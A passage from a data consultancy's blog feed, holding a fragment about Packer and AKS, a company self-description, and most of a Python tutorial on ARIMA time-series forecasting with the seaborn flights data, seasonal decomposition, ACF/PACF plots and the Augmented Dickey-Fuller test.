&lt;p&gt;&lt;a href="https://jmorano.moretrix.com/2022/04/using-ansible-to-finalize-hashicorp-packer-images/" rel="external"&gt;Packer&lt;/a&gt; is a fantastic tool for building identical machine
images for multiple platforms. These can – for example – then be
pushed to Azure Container Registry for use in Azure Kubernetes Service, or used on VMs in Azure.&lt;/p&gt;
&lt;p&gt;The real power comes from the ability to then run Ansible
playbooks on top of a base image. This allows us to automate
the installation of software and configuration, leveraging existing Ansible
roles we have developed in-house which weren’t necessarily developed for Kubernetes sessions.&lt;/p&gt;
&lt;h3 id="summary"&gt;Summary&lt;/h3&gt;
&lt;p&gt;Kubernetes success goes beyond cluster configs. From debugging containers and nodes to tracing issues through proxies, real-world AKS work demands a full-system view. With the right tools and mindset, you’ll turn tricky problems into valuable lessons.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/beyond-azure-kubernetes-service-basics/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Who We Are and What We Do: Inside Jumping Rivers</title><link>https://www.jumpingrivers.com/blog/inside-jumping-rivers/</link><pubDate>Tue, 09 Sep 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/inside-jumping-rivers/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/inside-jumping-rivers/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/inside-jumping-rivers/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;At &lt;a href="https://jumpingrivers.com/" rel="external"&gt;Jumping Rivers&lt;/a&gt;, we combine engineering,
automation, and analytics to streamline your data workflows and make
them more efficient. We take care of the tasks you don’t have the time
or capacity for, improve processes you might not even know could be optimised,
and work alongside your team to make your data and engineering operations easier
and more effective. From pioneering startups to established organisations,
we help our clients harness the power of data to work smarter and faster.&lt;/p&gt;
&lt;h2 id="who-we-are"&gt;Who We Are&lt;/h2&gt;
&lt;p&gt;We’re a team of passionate problem-solvers, technologists, and analytics experts. Jumping Rivers isn’t your typical consultancy; we turn technical expertise and hands-on experience into measurable impact for our clients.&lt;/p&gt;
&lt;h2 id="our-expertise"&gt;Our Expertise&lt;/h2&gt;
&lt;p&gt;Our team spans multiple disciplines, making us uniquely positioned to tackle any data challenge:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Data Science:&lt;/strong&gt; AI, predictive modelling, machine learning, automation, and advanced analytics that uncover actionable insights.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Engineering:&lt;/strong&gt; Robust, scalable pipelines, infrastructure, and automation to ensure your data is accurate, accessible, and efficient.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Cloud &amp;amp; Infrastructure:&lt;/strong&gt; Expertise spans leading cloud platforms including AWS, Azure, Kubernetes, and Databricks. We design and manage secure, scalable, and high-performance cloud solutions that support complex pipelines, automated workflows, collaborative analytics, and AI/ML deployment. This ensures your data is reliable, accessible, and ready to drive actionable insights, both now and as your organisation grows.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Dashboards &amp;amp; Shiny:&lt;/strong&gt; Development, maintenance, and support of Shiny applications and interactive dashboards, delivering insights in an accessible and actionable format.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Training:&lt;/strong&gt; Bespoke sessions in R, Python, SQL, and more, empowering your team with the skills to thrive in a data-driven world.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="our-partners"&gt;Our Partners&lt;/h2&gt;
&lt;p&gt;We collaborate with industry leaders like &lt;a href="http://posit.co/" rel="external"&gt;Posit&lt;/a&gt; and
&lt;a href="https://www.databricks.com/" rel="external"&gt;Databricks&lt;/a&gt;,
giving us and our clients access to cutting-edge tools, platforms, and
innovations. These partnerships help us stay ahead of the
curve and ensure our work is as forward-thinking as it is practical.&lt;/p&gt;
&lt;h2 id="how-we-handle-enquiries"&gt;How We Handle Enquiries&lt;/h2&gt;
&lt;p&gt;We do things differently. When a client reaches out,
our process is designed to ensure their specific needs are met:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Prompt Email Response:&lt;/strong&gt; We acknowledge every enquiry quickly and professionally.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Discovery Meeting:&lt;/strong&gt; We discuss the client’s challenges, goals, and context to fully understand the problem.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Custom Proposal:&lt;/strong&gt; We craft a tailored solution that fits the client’s objectives, budget, and timeline, rather than taking a one-size-fits-all approach.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;This personalised approach is why clients keep coming back.
We don’t just deliver projects; we deliver results that make
a real difference for teams and organisations.&lt;/p&gt;
&lt;h2 id="shiny-in-production-conference"&gt;Shiny in Production Conference&lt;/h2&gt;
&lt;p&gt;We’re proud to bring the data community together with our annual &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;Shiny
in Production&lt;/a&gt; conference. Our next conference takes place &lt;strong&gt;8th–9th October in Newcastle&lt;/strong&gt;,
featuring inspiring talks, hands-on workshops, and unrivalled networking
opportunities with leaders from large organisations.&lt;/p&gt;
&lt;h2 id="why-were-different"&gt;Why We’re Different&lt;/h2&gt;
&lt;p&gt;Jumping Rivers is more than a consultancy. We combine deep technical
expertise with a personalised, client-focused approach. We handle the complex,
time-consuming, and high-skill tasks that make your team’s work easier and
more effective. When you work with us, you’re not just hiring a service,
you’re gaining a partner committed to making your data and engineering
operations smarter, faster, and more impactful.&lt;/p&gt;
&lt;h2 id="our-people-experience-growth-and-teamwork"&gt;Our People: Experience, Growth, and Teamwork&lt;/h2&gt;
&lt;p&gt;At Jumping Rivers, we believe that great work starts with a great environment.
Our team thrives in a supportive, welcoming culture where curiosity is
encouraged, collaboration is the norm, and everyone’s voice is valued.
We place a strong emphasis on team building and shared learning, creating
opportunities for colleagues to grow their skills, share ideas, and tackle
challenges together. It’s a place where innovation, positivity, and
mutual support drive both personal and professional growth.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/inside-jumping-rivers/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Time Series Forecasting in Python</title><link>https://www.jumpingrivers.com/blog/time-series-forecasting-python-arima/</link><pubDate>Thu, 28 Aug 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/time-series-forecasting-python-arima/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/time-series-forecasting-python-arima/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/time-series-forecasting-python-arima/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;In this post we will be introducing the concept of time series
forecasting, with a focus on the ARIMA framework and how this can be
implemented in Python. We will be using a publicly available data set
and the following open source packages:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://seaborn.pydata.org/" rel="external"&gt;seaborn&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://matplotlib.org/" rel="external"&gt;matplotlib&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.statsmodels.org/stable/index.html" rel="external"&gt;statsmodels&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://pandas.pydata.org/" rel="external"&gt;pandas&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://numpy.org/" rel="external"&gt;numpy&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://scikit-learn.org/stable/" rel="external"&gt;scikit-learn&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="time-series"&gt;Time series&lt;/h2&gt;
&lt;p&gt;In time series analysis we are interested in sequential data made up of
a series of observations taken at regular intervals. Examples include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Weekly hospital occupancy&lt;/li&gt;
&lt;li&gt;Monthly sales figures&lt;/li&gt;
&lt;li&gt;Annual global temperature&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In many cases we want to use the observations up to the present day to
predict (or forecast) the next &lt;em&gt;N&lt;/em&gt; time points. For example, a hospital
that can forecast occupancy could reduce running costs by provisioning an
appropriate number of beds.&lt;/p&gt;
&lt;p&gt;This is where time series modelling fits in. The most basic time series
model is a simple linear regression, where we assume that the time
series evolves linearly over time. For non-linear time series we can
consider piecewise linear regression.&lt;/p&gt;
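&lt;p&gt;As a minimal sketch of the linear-regression baseline described above, the following fits a straight line to a short series by ordinary least squares and extrapolates it forward. The occupancy figures are made up, and the helper names &lt;code&gt;fit_linear_trend()&lt;/code&gt; and &lt;code&gt;forecast_linear()&lt;/code&gt; are hypothetical rather than taken from any library:&lt;/p&gt;

```python
def fit_linear_trend(values):
    """Least-squares fit of values[t] = intercept + slope * t for t = 0, 1, 2, ..."""
    n = len(values)
    times = range(n)
    mean_t = sum(times) / n
    mean_y = sum(values) / n
    # Slope = covariance(t, y) / variance(t)
    cov_ty = sum((t - mean_t) * (y - mean_y) for t, y in zip(times, values))
    var_t = sum((t - mean_t) ** 2 for t in times)
    slope = cov_ty / var_t
    intercept = mean_y - slope * mean_t
    return intercept, slope


def forecast_linear(values, n_ahead):
    """Extrapolate the fitted line to the next n_ahead time points."""
    intercept, slope = fit_linear_trend(values)
    start = len(values)
    return [intercept + slope * t for t in range(start, start + n_ahead)]


# Hypothetical weekly occupancy figures (made up for illustration)
occupancy = [100, 104, 109, 111, 117, 120]
print(forecast_linear(occupancy, n_ahead=3))
```

&lt;p&gt;A model like this can only ever forecast a straight line, which is why it struggles with seasonal or otherwise non-linear series.&lt;/p&gt;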
&lt;p&gt;What about more complex cases where we want to accurately capture subtle
variations in the data? We will now demonstrate the ARIMA framework in
Python using a real world data set.&lt;/p&gt;
&lt;h2 id="arima"&gt;ARIMA&lt;/h2&gt;
&lt;p&gt;ARIMA stands for “Auto-Regressive Integrated Moving Average” and is made
up of three key parts:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Auto-regression&lt;/strong&gt;: captures the relationship between an observation
and the last &lt;em&gt;k&lt;/em&gt; points (often referred to as “lagged” observations).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Integration&lt;/strong&gt;: accounts for “non-stationary” trends by taking the
difference between consecutive observations (a non-stationary trend
could include an overall upward trend where the mean observation is
increasing over time).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Moving average&lt;/strong&gt;: accounts for the relationship between an
observation and the residual error that would result from using a
moving average model applied to the lagged observations.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The three components (AR, I, MA) are controlled by the parameters
(&lt;em&gt;p&lt;/em&gt;, &lt;em&gt;d&lt;/em&gt;, &lt;em&gt;q&lt;/em&gt;). Setting one of these to zero will eliminate that
component of the model. For example, if the time series already appears
to be stationary we could set &lt;em&gt;d&lt;/em&gt; = 0 so that we do not perform
differencing.&lt;/p&gt;
&lt;p&gt;To demonstrate ARIMA on a real-world example, let’s load in the flights
data set from the &lt;code&gt;seaborn&lt;/code&gt; library:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;seaborn&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;sns&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;flights &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; sns&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;load_dataset(&lt;span style="color:#a5d6ff"&gt;&amp;#34;flights&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;flights&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;head()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## year month passengers
## 0 1949 Jan 112
## 1 1949 Feb 118
## 2 1949 Mar 132
## 3 1949 Apr 129
## 4 1949 May 121
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Let’s visualise the data:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;matplotlib.pyplot&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;plt&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;plot(flights[&lt;span style="color:#a5d6ff"&gt;&amp;#34;passengers&amp;#34;&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;xlabel(&lt;span style="color:#a5d6ff"&gt;&amp;#34;month&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ylabel(&lt;span style="color:#a5d6ff"&gt;&amp;#34;passengers&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/time-series-forecasting-python-arima/plots/passengers-1.png" alt="Time series plot displaying the number of flight passengers every month for a 12-year period. We observe a fluctuating seasonal trend with a clear peak in the summer months of each year. Both the annual average and the size of the seasonal fluctuation appear to be increasing over time. At month 0 we observe just over 100 passengers and at month 144 we observe over 400 passengers." /&gt;
&lt;p&gt;The data includes the number of passengers that flew each month over a
period of 12 years. We will start by fitting a model on the full data
set, then try holding out some test data for forecasting.&lt;/p&gt;
&lt;h3 id="data-inspection"&gt;Data inspection&lt;/h3&gt;
&lt;p&gt;We should begin by exploring the time series. There are a number of
questions that could be asked. For example:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Is the trend non-stationary?&lt;/li&gt;
&lt;li&gt;Does the plot feature a seasonal variation?&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Just from looking at the plot above the answer to both of these
questions is a clear “yes”! But what if the data were noisier and the
answer was not clear from a quick visual inspection? In that case we could try
decomposing the time series into the following components:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Trend&lt;/li&gt;
&lt;li&gt;Seasonal&lt;/li&gt;
&lt;li&gt;Residual (i.e. after we have subtracted the trend and seasonal
components)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Fortunately the &lt;code&gt;statsmodels&lt;/code&gt; library has a &lt;code&gt;seasonal_decompose()&lt;/code&gt;
function for this exact purpose:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;statsmodels.tsa.seasonal&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; seasonal_decompose
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; flights[&lt;span style="color:#a5d6ff"&gt;&amp;#34;passengers&amp;#34;&lt;/span&gt;] &lt;span style="color:#8b949e;font-style:italic"&gt;# convenience variable&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;decomposition &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; seasonal_decompose(y, period&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;12&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;For convenience we have assigned the passengers column of the original
&lt;code&gt;DataFrame&lt;/code&gt; to a variable called &lt;code&gt;y&lt;/code&gt;. Because we expect a seasonal
variation in the data we have chosen a period of 12 months. Let’s
inspect the decomposition:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;decomposition&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;plot()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/time-series-forecasting-python-arima/plots/decomposition-3.png" alt="Four plots arranged vertically showing a breakdown of the flight passengers time series. Viewed from top to bottom: the first panel displays the raw time series; the second panel displays the trend component which is increasing over time at a rate that is close to linear; the third panel displays the repeating seasonal fluctuation, which spans from -50 to +50; and the fourth panel displays the residuals that remain after the trend and seasonal variation have been subtracted. The residuals do not appear random, featuring instead a fluctuating pattern, suggesting that there are additional seasonal effects not accounted for." /&gt;
&lt;ul&gt;
&lt;li&gt;The top panel shows the original raw time series.&lt;/li&gt;
&lt;li&gt;In the second panel we see that there is indeed an increasing trend.
We will therefore need to include some differencing in the model
(&lt;em&gt;d&lt;/em&gt; &amp;gt; 0).&lt;/li&gt;
&lt;li&gt;The third panel shows the repeating seasonal component.&lt;/li&gt;
&lt;li&gt;The fourth panel shows that there is still a non-random residual after
the trend and seasonal component have been subtracted. This can result
from the fact that the seasonal “peaks” in the original plot appear to
grow in amplitude over time (i.e. it is not really a fixed seasonal
pattern).&lt;/li&gt;
&lt;/ul&gt;
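&lt;p&gt;To make the three components more concrete, here is a simplified sketch of a classical additive decomposition written by hand. It assumes an even period and uses made-up data; the function name &lt;code&gt;decompose_additive()&lt;/code&gt; is hypothetical, and the result is not guaranteed to match &lt;code&gt;seasonal_decompose()&lt;/code&gt; in every detail:&lt;/p&gt;

```python
def decompose_additive(values, period):
    """Split a series into trend, seasonal and residual parts (additive model).

    Assumes an even period, e.g. 4 for quarterly or 12 for monthly data.
    """
    n = len(values)
    half = period // 2
    trend = [None] * n
    for t in range(half, n - half):
        window = values[t - half:t + half + 1]
        # End points get half weight so the window is centred on t
        trend[t] = (0.5 * window[0] + sum(window[1:-1]) + 0.5 * window[-1]) / period

    # Average the detrended values for each position within the period
    buckets = [[] for _ in range(period)]
    for t in range(n):
        if trend[t] is not None:
            buckets[t % period].append(values[t] - trend[t])
    means = [sum(b) / len(b) for b in buckets]
    centre = sum(means) / period
    seasonal = [means[t % period] - centre for t in range(n)]

    # Whatever is left after removing trend and seasonality
    residual = [
        None if trend[t] is None else values[t] - trend[t] - seasonal[t]
        for t in range(n)
    ]
    return trend, seasonal, residual


# Toy series: linear trend plus a fixed pattern of period 4 (made up)
pattern = [3, -1, -4, 2]
toy = [10 + 2 * t + pattern[t % 4] for t in range(16)]
trend, seasonal, residual = decompose_additive(toy, period=4)
print(seasonal[:4])
```

&lt;p&gt;Because the toy series has a perfectly fixed seasonal pattern, its residuals are essentially zero. The flights data behaves differently because the seasonal amplitude grows over time.&lt;/p&gt;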
&lt;p&gt;It is also important to study the autocorrelation function (ACF) and
partial autocorrelation function (PACF). Again, the &lt;code&gt;statsmodels&lt;/code&gt;
library has everything we need:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The ACF plot shows how correlated observations are with other
observations that are &lt;em&gt;k&lt;/em&gt; time points away (we call this “lag-&lt;em&gt;k&lt;/em&gt;”):&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;statsmodels.graphics.tsaplots&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; plot_acf, plot_pacf
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plot_acf(y)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;xlabel(&lt;span style="color:#a5d6ff"&gt;&amp;#34;$k$&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/time-series-forecasting-python-arima/plots/acf-5.png" alt="Plot of the autocorrelation function applied to the raw time series data. We observe an autocorrelation of 1 at lag-0, which is guaranteed in autocorrelation plots. The autocorrelation then gradually decreases to roughly 0.5 at lag-20. A shaded confidence region is also plotted, which the autocorrelation drops inside at approximately lag-14, suggesting that the correlation between time points that are separated by more than 14 months is not statistically significant." /&gt;
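&lt;p&gt;For intuition, the autocorrelation at lag-&lt;em&gt;k&lt;/em&gt; can be computed by hand with the usual sample estimator. This is only a sketch on a made-up series, and the function name &lt;code&gt;autocorrelation()&lt;/code&gt; is hypothetical; in practice the &lt;code&gt;statsmodels&lt;/code&gt; plotting function does this work for us:&lt;/p&gt;

```python
def autocorrelation(values, lag):
    """Sample autocorrelation of a series at the given lag (lag 0 gives 1)."""
    n = len(values)
    mean = sum(values) / n
    deviations = [v - mean for v in values]
    # Denominator: total sum of squared deviations from the mean
    denom = sum(d * d for d in deviations)
    # Numerator: products of deviations that are `lag` steps apart
    numer = sum(deviations[t] * deviations[t + lag] for t in range(n - lag))
    return numer / denom


# Toy series with a repeating pattern of period 4 (made up for illustration)
series = [1, 3, 5, 3] * 6
for k in range(5):
    print(k, round(autocorrelation(series, k), 3))
```

&lt;p&gt;The toy series is strongly correlated with itself at lag-4, which is exactly the kind of signature a seasonal pattern leaves in an ACF plot.&lt;/p&gt;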
&lt;ul&gt;
&lt;li&gt;The PACF plot shows the “direct” correlation between observations at
lag-&lt;em&gt;k&lt;/em&gt; after removing the linear dependence of intermediate lags:&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plot_pacf(y)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;xlabel(&lt;span style="color:#a5d6ff"&gt;&amp;#34;$k$&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/time-series-forecasting-python-arima/plots/pacf-7.png" alt="Plot of the partial autocorrelation function applied to the raw time series data. As expected it starts at value 1 at lag-0, and rapidly drops to within 0.2 at lag-3. The partial autocorrelation remains fluctuating between -0.2 and +0.2 (aside from a few outliers) until lag-22. This suggests that the direct correlation, after the linear dependence of intermediate lags is subtracted, between time points that are separated by more than two months is statistically insignificant." /&gt;
&lt;p&gt;Both plots start with a lag of 0, where the correlation is always 1. The
ACF and PACF then typically drop down to close to zero. The point at
which this happens can help to inform the values for our &lt;em&gt;p&lt;/em&gt; and &lt;em&gt;q&lt;/em&gt;
parameters:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The value of &lt;em&gt;k&lt;/em&gt; at which the ACF reduces to statistically
insignificant values is regarded as a good choice for the &lt;em&gt;q&lt;/em&gt;
parameter. From the plot we see the ACF drops close to the confidence
region at approximately &lt;em&gt;k&lt;/em&gt; = 10.&lt;/li&gt;
&lt;li&gt;The value of &lt;em&gt;k&lt;/em&gt; at which the PACF appears to drop close to 0 is a
sensible choice for the &lt;em&gt;p&lt;/em&gt; parameter. Here the value &lt;em&gt;k&lt;/em&gt; = 2 appears
reasonable.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;These are really just educated guesses. In practice it would be worth
experimenting with the ranges 1 ≤ &lt;em&gt;p&lt;/em&gt; ≤ 3 and
5 ≤ &lt;em&gt;q&lt;/em&gt; ≤ 15 (we’ll not worry about this here).&lt;/p&gt;
&lt;p&gt;The &lt;em&gt;d&lt;/em&gt; parameter controls the amount of differencing:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;em&gt;d&lt;/em&gt; = 1 means we take the difference between every observation and the
previous observation.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;d&lt;/em&gt; = 2 means we difference the differenced time series again.&lt;/li&gt;
&lt;li&gt;… and so on.&lt;/li&gt;
&lt;/ul&gt;
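&lt;p&gt;The effect of repeated differencing is easy to see on a toy example. The sketch below uses a made-up quadratic series and a hypothetical helper called &lt;code&gt;difference()&lt;/code&gt;, written in plain Python so that each step is visible:&lt;/p&gt;

```python
def difference(values, d=1):
    """Apply d rounds of first-order differencing to a list of numbers."""
    result = list(values)
    for _ in range(d):
        # Each round replaces the series with its consecutive differences,
        # so the result is one element shorter than before
        result = [b - a for a, b in zip(result, result[1:])]
    return result


# Quadratic trend (made up for illustration): t**2 for t = 0..6
quadratic = [t ** 2 for t in range(7)]
print(difference(quadratic, d=1))  # [1, 3, 5, 7, 9, 11]
print(difference(quadratic, d=2))  # [2, 2, 2, 2, 2]
```

&lt;p&gt;One round of differencing still leaves a linear trend here, while a second round leaves a constant series with no trend at all.&lt;/p&gt;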
&lt;p&gt;The process should continue until the non-stationary trend is regarded
as statistically insignificant. This can be done by eye, but a better
way is to use the Augmented Dickey-Fuller (ADF) test:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;statsmodels.tsa.stattools&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; adfuller
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;adfuller(y)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## (0.8153688792060528, 0.9918802434376411, 13, 130, {'1%': -3.4816817173418295, '5%': -2.8840418343195267, '10%': -2.578770059171598}, 996.6929308390189)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The first two values returned give us the test statistic and &lt;em&gt;p&lt;/em&gt;-value
for the null hypothesis that the series is non-stationary (has a unit root). We also get the critical value
cutoffs at the 1%, 5% and 10% levels. Without going into too much
detail, the general rule is that if the test statistic is greater than
the 5% cutoff then the null hypothesis cannot be rejected, meaning that we should treat the
trend as non-stationary.&lt;/p&gt;
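&lt;p&gt;This rule of thumb can be sketched as a small helper that reads the tuple returned by &lt;code&gt;adfuller()&lt;/code&gt;. The function name &lt;code&gt;looks_stationary()&lt;/code&gt; is hypothetical, and the input is simply the output shown above copied in by hand:&lt;/p&gt;

```python
def looks_stationary(adf_result, level="5%"):
    """Return True if the ADF test statistic is below the chosen critical value."""
    test_statistic = adf_result[0]
    critical_values = adf_result[4]
    # The series is treated as stationary only when the statistic
    # is more negative than the critical value at the chosen level
    return critical_values[level] > test_statistic


# Output of adfuller(y), copied from above
raw_result = (
    0.8153688792060528, 0.9918802434376411, 13, 130,
    {"1%": -3.4816817173418295, "5%": -2.8840418343195267, "10%": -2.578770059171598},
    996.6929308390189,
)
print(looks_stationary(raw_result))  # False
```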
&lt;p&gt;In our case the test statistic (0.82) is well above the 5% cutoff (-2.88), so we should consider differencing the data and trying again.
Let’s use the &lt;code&gt;diff()&lt;/code&gt; function from &lt;code&gt;statsmodels&lt;/code&gt;:&lt;/p&gt;
&lt;ul&gt;
